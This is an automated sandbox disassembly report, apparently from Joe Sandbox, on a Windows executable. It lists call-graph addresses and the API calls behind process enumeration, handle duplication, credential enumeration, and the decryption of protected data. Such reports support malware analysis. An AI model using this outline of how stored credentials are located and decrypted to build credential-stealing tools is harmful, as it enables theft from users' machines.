40244->40088 40245->40059 40246->40064 40247->40071 40248->40081 40249->40083 40250->40086 40251->40092 40252->40088 40253->40096 40254->40098 40255->40107 40256->40050 40257->39995 40259 42a175 40258->40259 40261 42a122 40258->40261 40259->40176 40264 42b13b 147 API calls 40259->40264 40261->40259 40262 42a115 147 API calls 40261->40262 40265 43a174 40261->40265 40289 42a0a8 147 API calls 40261->40289 40262->40261 40264->40174 40279 43a196 40265->40279 40280 43a19e 40265->40280 40266 43a306 40266->40279 40305 4388c4 14 API calls 40266->40305 40269 42a115 147 API calls 40269->40280 40270 415a91 memset 40270->40280 40271 43a642 40271->40279 40309 4169a7 11 API calls 40271->40309 40275 43a635 40308 42c02e memset 40275->40308 40279->40261 40280->40266 40280->40269 40280->40270 40280->40279 40290 42ff8c 40280->40290 40298 4165ff 40280->40298 40301 439504 13 API calls 40280->40301 40302 4312d0 147 API calls 40280->40302 40303 42be4c memcpy memcpy memcpy memset memcpy 40280->40303 40304 43a121 11 API calls 40280->40304 40282 4169a7 11 API calls 40283 43a325 40282->40283 40283->40271 40283->40275 40283->40279 40283->40282 40284 42b5b5 memset memcpy 40283->40284 40285 42bf4c 14 API calls 40283->40285 40288 4165ff 11 API calls 40283->40288 40306 42b63e 14 API calls 40283->40306 40307 42bfcf memcpy 40283->40307 40284->40283 40285->40283 40288->40283 40289->40261 40310 43817e 40290->40310 40292 42ff99 40293 42ffe3 40292->40293 40294 42ffd0 40292->40294 40297 42ff9d 40292->40297 40315 4169a7 11 API calls 40293->40315 40314 4169a7 11 API calls 40294->40314 40297->40280 40299 4165a0 11 API calls 40298->40299 40300 41660d 40299->40300 40300->40280 40301->40280 40302->40280 40303->40280 40304->40280 40305->40283 40306->40283 40307->40283 40308->40271 40309->40279 40311 438187 40310->40311 40313 438192 40310->40313 40316 4380f6 40311->40316 40313->40292 40314->40297 40315->40297 40318 43811f 40316->40318 40317 438164 40317->40313 40318->40317 40320 4300e8 3 API calls 40318->40320 40321 437e5e 40318->40321 40320->40318 40344 437d3c 40321->40344 40323 437eb3 40323->40318 40324 437ea9 40324->40323 40329 437f22 40324->40329 40359 41f432 40324->40359 40327 437f06 40406 415c56 11 API calls 40327->40406 40331 437f7f 40329->40331 40332 432d4e 3 API calls 40329->40332 40330 437f95 40407 415c56 11 API calls 40330->40407 40331->40330 40334 43802b 40331->40334 40332->40331 40335 4165ff 11 API calls 40334->40335 40336 438054 40335->40336 40370 437371 40336->40370 40339 43806b 40340 438094 40339->40340 40408 42f50e 138 API calls 40339->40408 40342 437fa3 40340->40342 40343 4300e8 3 API calls 40340->40343 40342->40323 40409 41f638 104 API calls 40342->40409 40343->40342 40345 437d69 40344->40345 40348 437d80 40344->40348 40410 437ccb 11 API calls 40345->40410 40347 437d76 40347->40324 40348->40347 40349 437d90 40348->40349 40350 437da3 40348->40350 40349->40347 40414 437ccb 11 API calls 40349->40414 40352 438460 134 API calls 40350->40352 40355 437dcb 40352->40355 40354 437de8 40413 424f26 123 API calls 40354->40413 40355->40354 40411 444283 13 API calls 40355->40411 40357 437dfc 40412 437ccb 11 API calls 40357->40412 40360 41f54d 40359->40360 40366 41f44f 40359->40366 40361 41f466 40360->40361 40444 41c635 memset memset 40360->40444 40361->40327 40361->40329 40366->40361 40368 41f50b 40366->40368 40415 41f1a5 40366->40415 40440 41c06f memcmp 40366->40440 40441 41f3b1 90 API calls 40366->40441 40442 41f398 86 API calls 40366->40442 40368->40360 40368->40361 40443 41c295 86 API calls 40368->40443 40371 41703f 11 API calls 40370->40371 40372 437399 40371->40372 40373 43739d 40372->40373 40376 4373ac 40372->40376 40445 4446ea 11 API calls 40373->40445 40375 4373a7 40375->40339 40377 416935 16 API calls 40376->40377 40378 4373ca 40377->40378 40380 438460 134 API calls 40378->40380 40384 4251c4 137 API calls 40378->40384 40388 415a91 memset 40378->40388 40391 43758f 40378->40391 40403 437584 40378->40403 40405 437d3c 135 API calls 40378->40405 40446 425433 13 API calls 40378->40446 40447 425413 17 API calls 40378->40447 40448 42533e 16 API calls 40378->40448 40449 42538f 16 API calls 40378->40449 40450 42453e 123 API calls 40378->40450 40379 4375bc 40382 415c7d 16 API calls 40379->40382 40380->40378 40383 4375d2 40382->40383 40383->40375 40385 4442e6 11 API calls 40383->40385 40384->40378 40386 4375e2 40385->40386 40386->40375 40453 444283 13 API calls 40386->40453 40388->40378 40451 42453e 123 API calls 40391->40451 40392 4375f4 40397 437620 40392->40397 40398 43760b 40392->40398 40396 43759f 40399 416935 16 API calls 40396->40399 40401 416935 16 API calls 40397->40401 40454 444283 13 API calls 40398->40454 40399->40403 40401->40375 40403->40379 40452 42453e 123 API calls 40403->40452 40404 437612 memcpy 40404->40375 40405->40378 40406->40323 40407->40342 40408->40340 40409->40323 40410->40347 40411->40357 40412->40354 40413->40347 40414->40347 40416 41bc3b 101 API calls 40415->40416 40417 41f1b4 40416->40417 40418 41edad 86 API calls 40417->40418 40425 41f282 40417->40425 40419 41f1cb 40418->40419 40420 41f1f5 memcmp 40419->40420 40421 41f20e 40419->40421 40419->40425 40420->40421 40422 41f21b memcmp 40421->40422 40421->40425 40423 41f326 40422->40423 40426 41f23d 40422->40426 40424 41ee6b 86 API calls 40423->40424 40423->40425 40424->40425 40425->40366 40426->40423 40427 41f28e memcmp 40426->40427 40429 41c8df 56 API calls 40426->40429 40427->40423 40428 41f2a9 40427->40428 40428->40423 40431 41f308 40428->40431 40432 41f2d8 40428->40432 40430 41f269 40429->40430 40430->40423 40433 41f287 40430->40433 40434 41f27a 40430->40434 40431->40423 40438 4446ce 11 API calls 40431->40438 40435 41ee6b 86 API calls 40432->40435 40433->40427 40436 41ee6b 86 API calls 40434->40436 40437 41f2e0 40435->40437 40436->40425 40439 41b1ca memset 40437->40439 40438->40423 40439->40425 40440->40366 40441->40366 40442->40366 40443->40360 40444->40361 40445->40375 40446->40378 40447->40378 40448->40378 40449->40378 40450->40378 40451->40396 40452->40379 40453->40392 40454->40404 40455 441819 40458 430737 40455->40458 40457 441825 40459 430756 40458->40459 40471 43076d 40458->40471 40460 430774 40459->40460 40461 43075f 40459->40461 40472 43034a 40460->40472 40483 4169a7 11 API calls 40461->40483 40464 4307ce 40466 430819 memset 40464->40466 40476 415b2c 40464->40476 40465 43077e 40465->40464 40469 4307fa 40465->40469 40465->40471 40466->40471 40468 4307e9 40468->40466 40468->40471 40484 4169a7 11 API calls 40469->40484 40471->40457 40473 43034e 40472->40473 40475 430359 40472->40475 40485 415c23 memcpy 40473->40485 40475->40465 40477 415b46 40476->40477 40478 415b42 40476->40478 40477->40468 40478->40477 40479 415b94 40478->40479 40481 415b5a 40478->40481 40480 4438b5 10 API calls 40479->40480 40480->40477 40481->40477 40482 415b79 memcpy 40481->40482 40482->40477 40483->40471 40484->40471 40485->40475 40486 41493c EnumResourceNamesW

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                      • String ID: dllhost.exe$p+v@Fv@Bv$taskhost.exe$taskhostex.exe
                                                                                      • API String ID: 708747863-3857311822
                                                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 648 413edb-413ee2 646->648 647->648 653 413ee4 648->653 654 413ee7-413efe 648->654 662 413ea2-413eae CloseHandle 650->662 655 413e61-413e68 651->655 656 413e37-413e44 GetModuleHandleW 651->656 653->654 654->638 655->650 659 413e6a-413e77 QueryFullProcessImageNameW 655->659 656->655 658 413e46-413e5c GetProcAddress 656->658 658->655 659->650 662->641
                                                                                      APIs
                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                      • API String ID: 3536422406-1740548384
                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 773 40b58d-40b59e 774 40b5a4-40b5c0 GetModuleHandleW FindResourceW 773->774 775 40b62e-40b632 773->775 776 40b5c2-40b5ce LoadResource 774->776 777 40b5e7 774->777 776->777 778 40b5d0-40b5e5 SizeofResource LockResource 776->778 779 40b5e9-40b5eb 777->779 778->779 779->775 780 40b5ed-40b5ef 779->780 780->775 781 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 780->781 781->775
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                      • String ID: AE$BIN
                                                                                      • API String ID: 1668488027-3931574542
                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 767404330-0
                                                                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$FirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 1690352074-0
                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystemmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3558857096-0
                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                      • memset.MSVCRT ref: 00445725
                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                      • memset.MSVCRT ref: 00445755
                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
